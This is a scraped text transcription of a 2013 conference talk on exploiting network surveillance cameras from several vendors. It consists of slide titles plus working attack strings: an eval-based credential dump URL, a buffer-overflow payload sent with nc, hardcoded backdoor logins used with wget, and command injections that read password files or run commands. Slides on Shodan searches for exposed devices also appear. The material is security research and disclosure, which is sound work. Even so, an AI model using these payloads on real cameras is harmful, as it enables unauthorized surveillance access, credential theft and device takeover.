exploiting surveillance cameras
play

Exploiting Surveillance Cameras Like a Hollywood Hacker Craig - PowerPoint PPT Presentation

Exploiting Surveillance Cameras Like a Hollywood Hacker Craig Heffner, Tactical Network Solutions Friday, July 12, 2013 Introduction Embedded vulnerability analyst for Tactical Network Solutions Embedded Device Exploitation course


  1. Exploiting Surveillance Cameras Like a Hollywood Hacker Craig Heffner, Tactical Network Solutions Friday, July 12, 2013

  2. Introduction ✤ Embedded vulnerability analyst for Tactical Network Solutions ✤ Embedded Device Exploitation course instructor ✤ I do wireless stuff from time to time too Friday, July 12, 2013

  3. Objectives ✤ Analyze surveillance camera security ✤ Drop some 0-days ✤ Demo a true Hollywood-style hack Friday, July 12, 2013

  4. D-Link DCS-7410 Friday, July 12, 2013

  5. Lighttpd Access Rules Friday, July 12, 2013

  6. What Isn’t in the Access Rules? Friday, July 12, 2013

  7. rtpd.cgi Friday, July 12, 2013

  8. eval($QUERY_STRING) ✤ http://192.168.1.101/cgi-bin/rtpd.cgi? action=stop ✤ Friday, July 12, 2013

  9. Friday, July 12, 2013

  10. The Exploit (No, Seriously...) ✤ http://192.168.1.101/cgi-bin/rtpd.cgi? reboot Friday, July 12, 2013

  11. Grabing Admin Creds ✤ /cgi-bin/rtpd.cgi? echo&AdminPasswd_ss|tdb&get&HTTPAccount ✤ Friday, July 12, 2013

  12. pwned. Friday, July 12, 2013

  13. Also Affected Friday, July 12, 2013

  14. Also Affected Friday, July 12, 2013

  15. Also Affected Friday, July 12, 2013

  16. Also Affected Friday, July 12, 2013

  17. Also Affected Friday, July 12, 2013

  18. Also Affected Friday, July 12, 2013

  19. Also Affected Friday, July 12, 2013

  20. Shodan Dork Friday, July 12, 2013

  21. CVE-2013-1599 ✤ Disclosed by Core Security after talk submission Friday, July 12, 2013

  22. WVC80N Friday, July 12, 2013

  23. /img/snapshot.cgi Friday, July 12, 2013

  24. /adm/ez.cgi Friday, July 12, 2013

  25. strcpy(dest, QUERY_STRING) Friday, July 12, 2013

  26. Friday, July 12, 2013

  27. /img/snapshot.cgi?A*152 Friday, July 12, 2013

  28. Where to Return? Friday, July 12, 2013

  29. Return to sub_9B88 ✤ PAYLOAD=$(perl -e 'print "A"x148; print " \x88\x9B "') ✤ echo -ne "GET /img/snapshot.cgi?$PAYLOAD HTTP/1.0\r\n\r\n" | nc 192.168.1.100 80 Friday, July 12, 2013

  30. When Base64 Isn’t Base64 Friday, July 12, 2013

  31. BEST. USER GUIDE. EVER. Friday, July 12, 2013

  32. Decoded Config Friday, July 12, 2013

  33. pwned. Friday, July 12, 2013

  34. Also Affected Friday, July 12, 2013

  35. Shodan Dorks Friday, July 12, 2013

  36. Cisco PVC-2300 Friday, July 12, 2013

  37. .htpasswd Protection Friday, July 12, 2013

  38. /usr/local/www/oamp Friday, July 12, 2013

  39. cgi_get_value(var_18, “action”) Friday, July 12, 2013

  40. Valid Actions ✤ downloadConfigurationFile ✤ uploadConfigurationFile ✤ updateFirmware ✤ loadFirmware ✤ ... Friday, July 12, 2013

  41. getenv(“SESSIONID”) Friday, July 12, 2013

  42. strcasecmp(“login”, action) Friday, July 12, 2013

  43. cgi_get_value(var_10, “user”) Friday, July 12, 2013

  44. cgi_get_value(var_10, “password”) Friday, July 12, 2013

  45. PRO_GetStr(“OAMP”, “l1_usr”, ...) Friday, July 12, 2013

  46. PRO_GetStr(“OAMP”, “l1_pwd”, ...) Friday, July 12, 2013

  47. strcmp(user, l1_usr) Friday, July 12, 2013

  48. strcmp(password, l1_pwd) Friday, July 12, 2013

  49. Where are l1_usr and l1_pwd? Friday, July 12, 2013

  50. Friday, July 12, 2013

  51. Getting a Session ID ✤ $ wget http://192.168.1.101/oamp/System.xml? action=login&user=L1_admin&password=L1_51 ✤ Friday, July 12, 2013

  52. downloadConfigurationFile ✤ $ wget --header=”sessionID: 57592414” \ http://192.168.1.101/oamp/System.xml?\ action=downloadConfigurationFile Friday, July 12, 2013

  53. When Base64 Isn’t Base64 Friday, July 12, 2013

  54. Non-Standard Key String Friday, July 12, 2013

  55. Decoded Config Friday, July 12, 2013

  56. pwned. Friday, July 12, 2013

  57. action=loadFirmware Friday, July 12, 2013

  58. Friday, July 12, 2013

  59. pwned x2 ✤ $ wget --header=”sessionID: 57592414” \ http://192.168.1.101/oamp/System.xml?\ action=loadFirmware&url=https://127.0.0.1:65534/ ;reboot; Friday, July 12, 2013

  60. Also Affected Friday, July 12, 2013

  61. Shodan Dork Friday, July 12, 2013

  62. IQInvision IQ832N Friday, July 12, 2013

  63. Default Unauth Video Feed Friday, July 12, 2013

  64. Admin Area Password Protected Friday, July 12, 2013

  65. oidtable.cgi Friday, July 12, 2013

  66. strstr(QUERY_STRING, “grep=”) Friday, July 12, 2013

  67. if(strlen(grep) < 32) Friday, July 12, 2013

  68. sprintf(“grep -i ‘%s’...”) Friday, July 12, 2013

  69. popen(“grep -i ‘%s’...”) Friday, July 12, 2013

  70. Friday, July 12, 2013

  71. Command Injection ✤ http://192.168.1.101/oidtable.cgi?grep= '$IFS/tmp/a;ps;' ✤ grep -i ‘’ /tmp/a;ps;’’ /tmp/oidtable.html Friday, July 12, 2013

  72. Retrieving Arbitrary Files ✤ http://192.168.1.101/oidtable.cgi?grep= '$IFS/etc/privpasswd;' ✤ grep -i ‘’ /etc/privpasswd;’’ /tmp/oidtable.html Friday, July 12, 2013

  73. Encrypted Admin Password Friday, July 12, 2013

  74. Decrypted Admin Password Friday, July 12, 2013

  75. pwned. Friday, July 12, 2013

  76. Also Affected Friday, July 12, 2013

  77. Shodan Dork ✤ jht Friday, July 12, 2013

  78. 3SVision N5071 Friday, July 12, 2013

  79. Restricted Firmware Download Friday, July 12, 2013

  80. Friday, July 12, 2013

  81. Use the Source, Luke Friday, July 12, 2013

  82. Literacy FTW Friday, July 12, 2013

  83. /home/3s/bin Friday, July 12, 2013

  84. pwdgrp_get_userinfo Friday, July 12, 2013

  85. Friday, July 12, 2013

  86. Hardest. Exploit. Ever. Friday, July 12, 2013

  87. pwned. Friday, July 12, 2013

  88. pwned. Friday, July 12, 2013

  89. pwned. Friday, July 12, 2013

  90. do_records Friday, July 12, 2013

  91. records.cgi?action=remove Friday, July 12, 2013

  92. strstr(cgi_parameters, “&filename”) Friday, July 12, 2013

  93. system(“rm /mnt/sd/media/%s”) Friday, July 12, 2013

  94. pwned x2 ✤ $ wget \ --user=3sadmin --password=27988303 \ 'http://192.168.1.101/records.cgi?\ action=remove&storage=sd&filename= `reboot` ' Friday, July 12, 2013

  95. Also Affected Friday, July 12, 2013

  96. Also Affected Friday, July 12, 2013

  97. Also Affected Friday, July 12, 2013

  98. Also Affected Friday, July 12, 2013

  99. Also Affected Friday, July 12, 2013

  100. Shodan Dorks Friday, July 12, 2013

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend